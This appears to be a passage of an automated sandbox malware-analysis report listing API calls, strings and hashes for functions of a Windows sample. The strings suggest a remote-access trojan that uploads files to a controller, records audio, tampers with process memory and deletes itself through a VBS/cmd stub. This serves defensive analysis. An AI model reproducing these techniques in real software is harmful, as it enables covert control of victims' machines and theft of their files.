                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1m70ggeepT.exe,00000001,0040764D,C:\Users\user\Desktop\1m70ggeepT.exe,00000003,00407675,Mw,004076CE), ref: 00407284
                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: C:\Users\user\Desktop\1m70ggeepT.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                • _wcslen.LIBCMT ref: 0041C13B
                                • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                • GetLastError.KERNEL32 ref: 0041C173
                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                • GetLastError.KERNEL32 ref: 0041C1D0
                                Similarity
                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                • String ID: ?
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID:
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$0TG$0TG$NG$NG
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                • __aulldiv.LIBCMT ref: 00408D4D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $hdF$NG
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: IA$\ws2_32$\wship6$getaddrinfo
                                • API String ID: 2490988753-2533987332
                                • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                • ExitProcess.KERNEL32 ref: 0041D665
                                • CreatePopupMenu.USER32 ref: 0041D66B
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                • SetEvent.KERNEL32(00000000), ref: 00404E43
                                • CloseHandle.KERNEL32(00000000), ref: 00404E4C
                                • closesocket.WS2_32(FFFFFFFF), ref: 00404E5A
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404E91
                                • SetEvent.KERNEL32(00000000), ref: 00404EA2
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404EA9
                                • SetEvent.KERNEL32(00000000), ref: 00404EBA
                                • CloseHandle.KERNEL32(00000000), ref: 00404EBF
                                • CloseHandle.KERNEL32(00000000), ref: 00404EC4
                                • SetEvent.KERNEL32(00000000), ref: 00404ED1
                                • CloseHandle.KERNEL32(00000000), ref: 00404ED6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                • String ID: PkGNG
                                • API String ID: 3658366068-263838557
                                • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: (x$8SG$8SG$hdF$pQG$pQG
                                • API String ID: 3795512280-3569947409
                                • Opcode ID: 90f81a8c835b78a509db603d52e056b33c5ce4745e21562e65a9418a5dbb7178
                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                • Opcode Fuzzy Hash: 90f81a8c835b78a509db603d52e056b33c5ce4745e21562e65a9418a5dbb7178
                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$hdF$open
                                • API String ID: 1913171305-51354631
                                • Opcode ID: f258cf52c1f85b39fd526d8af0fa5692be2d229592be5a4268ec070556a5325b
                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                • Opcode Fuzzy Hash: f258cf52c1f85b39fd526d8af0fa5692be2d229592be5a4268ec070556a5325b
                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                • WSAGetLastError.WS2_32 ref: 00404A21
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-3229884001
                                • Opcode ID: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                • Opcode Fuzzy Hash: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                • _free.LIBCMT ref: 004512FF
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00451321
                                • _free.LIBCMT ref: 00451336
                                • _free.LIBCMT ref: 00451341
                                • _free.LIBCMT ref: 00451363
                                • _free.LIBCMT ref: 00451376
                                • _free.LIBCMT ref: 00451384
                                • _free.LIBCMT ref: 0045138F
                                • _free.LIBCMT ref: 004513C7
                                • _free.LIBCMT ref: 004513CE
                                • _free.LIBCMT ref: 004513EB
                                • _free.LIBCMT ref: 00451403
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                • GetLastError.KERNEL32 ref: 00455CEF
                                • __dosmaperr.LIBCMT ref: 00455CF6
                                • GetFileType.KERNEL32(00000000), ref: 00455D02
                                • GetLastError.KERNEL32 ref: 00455D0C
                                • __dosmaperr.LIBCMT ref: 00455D15
                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                • GetLastError.KERNEL32 ref: 00455EB1
                                • __dosmaperr.LIBCMT ref: 00455EB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                • __alloca_probe_16.LIBCMT ref: 00453EEA
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                • __alloca_probe_16.LIBCMT ref: 00453F94
                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                • __freea.LIBCMT ref: 00454003
                                • __freea.LIBCMT ref: 0045400F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID: \@E
                                • API String ID: 201697637-1814623452
                                • Opcode ID: a13eae8444da2cd2cd5bd958d846eb3c57669df7893581f63a52b2ce53b4c5f1
                                • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
